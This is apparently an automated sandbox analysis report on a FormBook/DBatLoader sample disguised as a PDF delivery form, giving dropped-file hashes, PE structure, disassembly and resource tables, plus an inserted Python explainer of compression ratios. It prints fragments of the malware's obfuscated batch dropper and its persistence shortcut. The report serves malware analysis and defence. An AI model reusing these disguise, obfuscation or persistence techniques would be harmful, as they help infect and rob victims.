Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\Public\Libraries\dxobknwL.pif | RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe | malicious | DBatLoader, FormBook
C:\Users\Public\Libraries\dxobknwL.pif | Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe | malicious | DBatLoader, FormBook
C:\Users\Public\Libraries\dxobknwL.pif | F.O Pump Istek,Docx.bat | malicious | DBatLoader, PureLog Stealer, Snake Keylogger
C:\Users\Public\Libraries\dxobknwL.pif | D.G Governor Istek,Docx.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger
C:\Users\Public\Libraries\dxobknwL.pif | qDKTsL1y44.exe | malicious | DBatLoader
C:\Users\Public\Libraries\dxobknwL.pif | PRODUCT.bat | malicious | AveMaria, DBatLoader, UACMe
C:\Users\Public\Libraries\dxobknwL.pif | purchaseorder.bat | malicious | AveMaria, DBatLoader, UACMe
C:\Users\Public\Libraries\dxobknwL.pif | PO11550.exe | malicious | AveMaria, DBatLoader, UACMe
C:\Users\Public\Libraries\dxobknwL.pif | SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe | malicious | AgentTesla, DBatLoader, RedLine
C:\Users\Public\Libraries\dxobknwL.pif | PCMNil7wkU.exe | malicious | AgentTesla, AsyncRAT, DBatLoader, RedLine
                                                                                        Process:C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
                                                                                        File Type:DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):8556
                                                                                        Entropy (8bit):4.623706637784657
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:dSSQx41VVrTlS2owuuWTtkY16Wdhdsu0mYKDCIfYaYuX1fcDuy:Vrhgwuua5vdnQaCIVJF6uy
                                                                                        MD5:60CD0BE570DECD49E4798554639A05AE
                                                                                        SHA1:BD7BED69D9AB9A20B5263D74921C453F38477BCB
                                                                                        SHA-256:CA6A6C849496453990BECEEF8C192D90908C0C615FA0A1D01BCD464BAD6966A5
                                                                                        SHA-512:AB3DBDB4ED95A0CB4072B23DD241149F48ECFF8A69F16D81648E825D9D81A55954E5DD9BC46D3D7408421DF30C901B9AD1385D1E70793FA8D715C86C9E800C57
                                                                                        Malicious:true
                                                                                        Process:C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):615385
                                                                                        Entropy (8bit):7.389357877237351
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:da/bSw1ous1eA4JIFIZNbBXgNIMn0h8OYRBl3VjUcSxxi1nHW8:da/JjR6yZNu0fYXvjUtxs1nZ
                                                                                        MD5:020E7647D955DF47ED1CA4330FD7B8DE
                                                                                        SHA1:A6B089F6527AC18AEE1F98F0984C7AEA1370B2CF
                                                                                        SHA-256:17EDBFA3B0F39EAF85103A61B82F9B68EEEDC4C92A20438940F995FA49608461
                                                                                        SHA-512:6CBA9BDBE5770C3EFC999D3988A2CA21D561EDFE64A1433CB82475AC2F5A9B3A036E255E56DA73CA70BF9F209197AE8F74A039BEA9C4DFBC4687F8B39CB58D5D
                                                                                        Malicious:true
                                                                                        Process:C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):1444352
                                                                                        Entropy (8bit):6.739262242253885
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:Gae+1jKFTxeZhauIhY8oYsO0COg21wu0L8U:Ge16FeGrI/g21W8U
                                                                                        MD5:9E67C73F86B034D009280AB03DB20124
                                                                                        SHA1:ABA6A0DE8E85CF5A84C0A158D3908189ECF29330
                                                                                        SHA-256:B55CF6B5EC66FDC4DBBECC4E2F7698549964EC234BD0B55D057527D59D91147D
                                                                                        SHA-512:22ECFA7F450A2EDBDB964A900524069F9B12804D691D204EDA66EFB6C2EB212E8E81229CC5E27626EA699749A72107ADB45FCE5A7AE4DD21F7FE4D4EA33AB9FF
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 63%
                                                                                        Process:C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
                                                                                        File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (420), with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):46543
                                                                                        Entropy (8bit):4.705001079878445
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:Ud6T6yIssKMyD/LgZ0+9Z2noufIBUEADZQp2H8ZLq:UdQFIssKMyjL4X2T8UbZT
                                                                                        MD5:637A66953F03B084808934ED7DF7192F
                                                                                        SHA1:D3AE40DFF4894972A141A631900BD3BB8C441696
                                                                                        SHA-256:41E1F89A5F96F94C2C021FBC08EA1A10EA30DAEA62492F46A7F763385F95EC20
                                                                                        SHA-512:2A0FEDD85722A2701D57AA751D5ACAA36BBD31778E5D2B51A5A1B21A687B9261F4685FD12E894244EA80B194C76E722B13433AD9B649625D2BC2DB4365991EA3
                                                                                        Malicious:false
                                                                                        Process:C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):175800
                                                                                        Entropy (8bit):6.631791793070417
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
                                                                                        MD5:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                        SHA1:2A001C30BA79A19CEAF6A09C3567C70311760AA4
                                                                                        SHA-256:BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
                                                                                        SHA-512:C7F5BAAD732424B975A426867D3D8B5424AA830AA172ED0FF0EF630070BF2B4213750E123A36D8C5A741E22D3999CA1D7E77C62D4B77D6295B20A38114B7843C
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                        Joe Sandbox View:
• Filename: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, Detection: malicious
• Filename: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, Detection: malicious
• Filename: F.O Pump Istek,Docx.bat, Detection: malicious
• Filename: D.G Governor Istek,Docx.exe, Detection: malicious
• Filename: qDKTsL1y44.exe, Detection: malicious
• Filename: PRODUCT.bat, Detection: malicious
• Filename: purchaseorder.bat, Detection: malicious
• Filename: PO11550.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, Detection: malicious
• Filename: PCMNil7wkU.exe, Detection: malicious
                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....>.{..................................... ....@.......................... .......c........... ..............................................................H....................................................................................text............................... ..`.data........ ...P..................@....tls.................`..............@....rdata...............b..............@..P.idata... ...........d..............@..@.edata...............|..8...,...@...@..@
                                                                                        Process:C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
                                                                                        File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Lwnkboxd.PIF">), ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):104
                                                                                        Entropy (8bit):5.133038459576723
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMCBvsbxHO1KIAVy:HRYFVmTWDyzHExuA9s
                                                                                        MD5:64C4DFE05A58648679EAC4524CAB3C0B
                                                                                        SHA1:1B1175E38FDF4A1CD818A3D11D34D01D144C607B
                                                                                        SHA-256:1BECAF494B81436056255069F8FBDB83A75BC29EBC378D227A350DA6900F84C6
                                                                                        SHA-512:A87BEBF6EDF7A513E0EC610589792E3DC38962844C9E4EAB35D1E89CB675B8C3598A4D74C0CA8EC2177AE444D4F71F8D48495B9113CBB6EB2070BBDAEEFC438B
                                                                                        Malicious:true
                                                                                        Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Lwnkboxd.PIF"..IconIndex=923454..HotKey=48..
                                                                                        Process:C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
                                                                                        File Type:DOS batch file, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):15789
                                                                                        Entropy (8bit):4.658965888116939
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:wleG1594aKczJRP1dADCDswtJPZ9KZVst1U:LA4aLz08JaJ
                                                                                        MD5:CCE3C4AEE8C122DD8C44E64BD7884D83
                                                                                        SHA1:C555C812A9145E2CBC66C7C64BA754B0C7528D6D
                                                                                        SHA-256:4A12ABB62DD0E5E1391FD51B7448EF4B9DA3B3DC83FF02FB111E15D6A093B5E8
                                                                                        SHA-512:EA23EDFB8E3CDA49B78623F6CD8D0294A4F4B9B11570E8478864EBDEE39FCC6B8175B52EB947ED904BE27B5AF2535B9CA08595814557AE569020861A133D827D
                                                                                        Malicious:false
                                                                                        Preview:.@echo off..@% %e%.%c%o..%h%. .......%o%r.r.r.....% %.......%o%..%f% .%f%o%..s%...... .%e%.r.%t%...o..r.% %.....%"%.......%u%.%T%r..%A%..%j%r........%=%.. o......%s%....o...%e%.....%t%.% %........%"%.r.......o%..%uTAj%"%.. . ..%N%.r r.... %U%... .oo...%M%r.........%j%.....%=%.....o....%=%.%"%r...... %..%uTAj%"% .....%m%..oo%X%.o.. %m%.....or.%w%....%O%.%g%.....%B%.o .r.. %W%..%D%........%t%o.r...%%NUMj%h% ...o.%t%..%t%o......o%p%.........%"% .r%..%uTAj%"% .... ..%G%...o.. ..%n%..rr..%j%..o......%D%...o .r..%R%r.
                                                                                        Process:C:\Windows\SysWOW64\proquota.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                        Category:dropped
                                                                                        Size (bytes):114688
                                                                                        Entropy (8bit):0.9746603542602881
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Entropy (8bit):6.739262242253885
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) a (10002005/4) 99.38%
                                                                                        • InstallShield setup (43055/19) 0.43%
                                                                                        • Windows Screen Saver (13104/52) 0.13%
                                                                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                        File name:Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
                                                                                        File size:1'444'352 bytes
                                                                                        MD5:9e67c73f86b034d009280ab03db20124
                                                                                        SHA1:aba6a0de8e85cf5a84c0a158d3908189ecf29330
                                                                                        SHA256:b55cf6b5ec66fdc4dbbecc4e2f7698549964ec234bd0b55d057527d59d91147d
                                                                                        SHA512:22ecfa7f450a2edbdb964a900524069f9b12804d691d204eda66efb6c2eb212e8e81229cc5e27626ea699749a72107adb45fce5a7ae4dd21f7fe4d4ea33ab9ff
                                                                                        SSDEEP:24576:Gae+1jKFTxeZhauIhY8oYsO0COg21wu0L8U:Ge16FeGrI/g21W8U
                                                                                        TLSH:F9655B91A61387E1D27609343F0772F9A82D3C1CAA34A58E6FDC1D6EE971942EC33572
                                                                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                        Icon Hash:1b2b4380030b8b4b
                                                                                        Entrypoint:0x49375c
                                                                                        Entrypoint Section:.itext
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                        DLL Characteristics:
                                                                                        Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:f0e442fd53b74b3dd79fc9c49606a925
                                                                                        Instruction
                                                                                        push ebp
                                                                                        mov ebp, esp
                                                                                        add esp, FFFFFFF0h
                                                                                        push ebx
                                                                                        mov eax, 00492050h
                                                                                        call 00007F80650F07ECh
                                                                                        mov ebx, dword ptr [00495FE0h]
                                                                                        mov eax, dword ptr [ebx]
                                                                                        call 00007F8065152C9Fh
                                                                                        mov ecx, dword ptr [00495EE4h]
                                                                                        mov eax, dword ptr [ebx]
                                                                                        mov edx, dword ptr [00490994h]
                                                                                        call 00007F8065152CA4h
                                                                                        mov ecx, dword ptr [00495E1Ch]
                                                                                        mov eax, dword ptr [ebx]
                                                                                        mov edx, dword ptr [0048B62Ch]
                                                                                        call 00007F8065152C91h
                                                                                        mov ecx, dword ptr [00496174h]
                                                                                        mov eax, dword ptr [ebx]
                                                                                        mov edx, dword ptr [00490608h]
                                                                                        call 00007F8065152C7Eh
                                                                                        mov ecx, dword ptr [00495D78h]
                                                                                        mov eax, dword ptr [ebx]
                                                                                        mov edx, dword ptr [004907F8h]
                                                                                        call 00007F8065152C6Bh
                                                                                        mov eax, dword ptr [ebx]
                                                                                        call 00007F8065152CE4h
                                                                                        pop ebx
                                                                                        call 00007F80650EE616h
                                                                                        nop
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9b000 | 0x2b9a | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0xbf200 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa0000 | 0xa65c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x9f000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9b834 | 0x6cc | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x912b8 | 0x91400 | 3aaad673943a670890133def3eba7b57 | False | 0.5050643421901894 | data | 6.519503495540056 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0x93000 | 0x7d4 | 0x800 | a0ab1580d6787b09c0e91d664e4d1825 | False | 0.62109375 | data | 6.184238549726377 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x94000 | 0x21ac | 0x2200 | ed0dc071a700ac9bc77c71679030999f | False | 0.40245863970588236 | data | 3.8564608652069694 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0x97000 | 0x372c | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x9b000 | 0x2b9a | 0x2c00 | 813fd04ec31be6470c47a2f6de69e507 | False | 0.3194247159090909 | data | 5.194560124661258 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x9e000 | 0x40 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x9f000 | 0x18 | 0x200 | ab98651063e68dcd71c0ccc744e1f5cf | False | 0.05078125 | data | 0.2044881574398449 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xa0000 | 0xa65c | 0xa800 | def97e06039844648b4361fc5490eeef | False | 0.5651739211309523 | data | 6.650670111191524 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0xab000 | 0xbf200 | 0xbf200 | 716a4e3999432de9d1f2a34d29178c5f | False | 0.404576622792675 | data | 6.10872507016811 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0xabefc | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
RT_CURSOR | 0xac030 | 0x134 | data | English | United States | 0.4642857142857143
RT_CURSOR | 0xac164 | 0x134 | data | English | United States | 0.4805194805194805
RT_CURSOR | 0xac298 | 0x134 | data | English | United States | 0.38311688311688313
RT_CURSOR | 0xac3cc | 0x134 | data | English | United States | 0.36038961038961037
RT_CURSOR | 0xac500 | 0x134 | data | English | United States | 0.4090909090909091
RT_CURSOR | 0xac634 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
RT_BITMAP | 0xac768 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
RT_BITMAP | 0xac938 | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | English | United States | 0.46487603305785125
RT_BITMAP | 0xacb1c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
RT_BITMAP | 0xaccec | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39870689655172414
RT_BITMAP | 0xacebc | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.4245689655172414
RT_BITMAP | 0xad08c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5021551724137931
RT_BITMAP | 0xad25c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5064655172413793
RT_BITMAP | 0xad42c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
RT_BITMAP | 0xad5fc | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5344827586206896
RT_BITMAP | 0xad7cc | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
RT_BITMAP | 0xad99c | 0x9c6e8 | Device independent bitmap graphic, 1002 x 213 x 24, image size 640704 | English | United States | 0.45959540783838787
RT_BITMAP | 0x14a084 | 0xc0 | Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors | English | United States | 0.5208333333333334
RT_BITMAP | 0x14a144 | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors | English | United States | 0.42857142857142855
RT_BITMAP | 0x14a224 | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors | English | United States | 0.4955357142857143
RT_BITMAP | 0x14a304 | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors | English | United States | 0.38392857142857145
RT_BITMAP | 0x14a3e4 | 0xc0 | Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors | English | United States | 0.4947916666666667
RT_BITMAP | 0x14a4a4 | 0xc0 | Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors | English | United States | 0.484375
RT_BITMAP | 0x14a564 | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors | English | United States | 0.42410714285714285
RT_BITMAP | 0x14a644 | 0xc0 | Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors | English | United States | 0.5104166666666666
RT_BITMAP | 0x14a704 | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors | English | United States | 0.5
RT_BITMAP | 0x14a7e4 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | English | United States | 0.4870689655172414
RT_BITMAP | 0x14a8cc | 0xc0 | Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors | English | United States | 0.4895833333333333
                                                                                        RT_BITMAP0x14a98c0xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.3794642857142857
                                                                                        RT_ICON0x14aa6c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 1889 x 1889 px/m0.2969858156028369
                                                                                        RT_ICON0x14aed40x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 1889 x 1889 px/m0.20040983606557378
                                                                                        RT_ICON0x14b85c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 1889 x 1889 px/m0.14681050656660413
                                                                                        RT_ICON0x14c9040x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 1889 x 1889 px/m0.10394190871369295
                                                                                        RT_ICON0x14eeac0x1249PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9374065370647298
                                                                                        RT_DIALOG0x1500f80x52data0.7682926829268293
                                                                                        RT_DIALOG0x15014c0x52data0.7560975609756098
                                                                                        RT_STRING0x1501a00x1b4data0.4954128440366973
                                                                                        RT_STRING0x1503540x314data0.39847715736040606
                                                                                        RT_STRING0x1506680x338data0.4575242718446602
                                                                                        RT_STRING0x1509a00xb8data0.6793478260869565
                                                                                        RT_STRING0x150a580xf8data0.6290322580645161
                                                                                        RT_STRING0x150b500x22cdata0.5
                                                                                        RT_STRING0x150d7c0x3f0data0.39186507936507936
                                                                                        RT_STRING0x15116c0x3c0data0.38333333333333336
                                                                                        RT_STRING0x15152c0x388data0.4092920353982301
                                                                                        RT_STRING0x1518b40x3f0data0.35119047619047616
                                                                                        RT_STRING0x151ca40x190data0.4975
                                                                                        RT_STRING0x151e340xccdata0.6225490196078431
                                                                                        RT_STRING0x151f000x1c4data0.5376106194690266
                                                                                        RT_STRING0x1520c40x3c8data0.3181818181818182
                                                                                        RT_STRING0x15248c0x338data0.42961165048543687
                                                                                        RT_STRING0x1527c40x294data0.42424242424242425
                                                                                        RT_RCDATA0x152a580x10data1.5
                                                                                        RT_RCDATA0x152a680x334data0.6963414634146341
                                                                                        RT_RCDATA0x152d9c0x9841dataEnglishUnited States0.040511070631398007
                                                                                        RT_RCDATA0x15c5e00xda16Delphi compiled form 'TfrmMain'0.08751567257746731
                                                                                        RT_GROUP_CURSOR0x169ff80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                        RT_GROUP_CURSOR0x16a00c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                        RT_GROUP_CURSOR0x16a0200x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                        RT_GROUP_CURSOR0x16a0340x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                        RT_GROUP_CURSOR0x16a0480x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                        RT_GROUP_CURSOR0x16a05c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                        RT_GROUP_CURSOR0x16a0700x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                        RT_GROUP_ICON0x16a0840x4cdata0.8289473684210527
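The trailing ratio on every resource row above is Joe Sandbox's ZLIB complexity figure: the zlib-compressed size divided by the raw size. That is why the 0x14-byte RT_GROUP_CURSOR entries score above 1.0 (zlib's header, checksum and block framing outweigh the payload), the 0x9841-byte RT_RCDATA compresses to 0.04 (almost entirely repeated bytes), and the already-compressed PNG icon sits near 0.94. The Python below is an added illustration, not part of the Joe Sandbox report or of the sample: it reproduces the figure on constructed blobs of those same sizes and sorts them into coarse triage buckets. The thresholds in classify() are this example's own choice, not Joe Sandbox's.

```python
import random
import zlib


def zlib_complexity(data: bytes) -> float:
    """zlib-compressed size divided by raw size, the per-resource figure
    Joe Sandbox reports. Near 0: highly redundant bytes. Near 1: already
    compressed, encrypted or random. Above 1: the blob is so small that
    zlib's 2-byte header, 4-byte Adler-32 and block framing dominate."""
    if not data:
        return 0.0
    return len(zlib.compress(data)) / len(data)


def classify(ratio: float, size: int) -> str:
    """Coarse triage bucket for one resource row (thresholds chosen for
    this example, not taken from Joe Sandbox)."""
    if size < 64:
        return "tiny (ratio dominated by zlib framing)"
    if ratio < 0.1:
        return "highly redundant (padding or repeated bytes)"
    if ratio > 0.9:
        return "incompressible (compressed, encrypted or random data)"
    return "typical structured data"


# Constructed blobs standing in for the three regimes visible in the
# resource table; none of these bytes come from the analysed sample.
_rng = random.Random(1)
SAMPLES = {
    # 0x14 bytes of distinct values, the size of one RT_GROUP_CURSOR entry
    "20-byte header-like blob": bytes(range(0x14)),
    # 0x9841 zero bytes, the size of the low-complexity RT_RCDATA entry
    "zero-filled rcdata": bytes(0x9841),
    # 0x1249 pseudo-random bytes, the size of the PNG icon resource
    "pseudo-random rcdata": bytes(_rng.getrandbits(8) for _ in range(0x1249)),
}


def report(samples=SAMPLES):
    """Return {label: (size, ratio rounded to 4 places, bucket)}."""
    out = {}
    for label, blob in samples.items():
        ratio = zlib_complexity(blob)
        out[label] = (len(blob), round(ratio, 4), classify(ratio, len(blob)))
    return out


if __name__ == "__main__":
    for label, (size, ratio, bucket) in report().items():
        print(f"{label:26s} size=0x{size:x} zlib={ratio:.4f} {bucket}")
```

Run the block as a script to see the three regimes side by side; when reading a real report, treat a large resource with a ratio near 1.0 as a candidate for an embedded compressed or encrypted payload and a ratio near 0 as mostly padding, and ignore the ratio entirely for resources of a few dozen bytes.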
DLL | Import
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll | GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
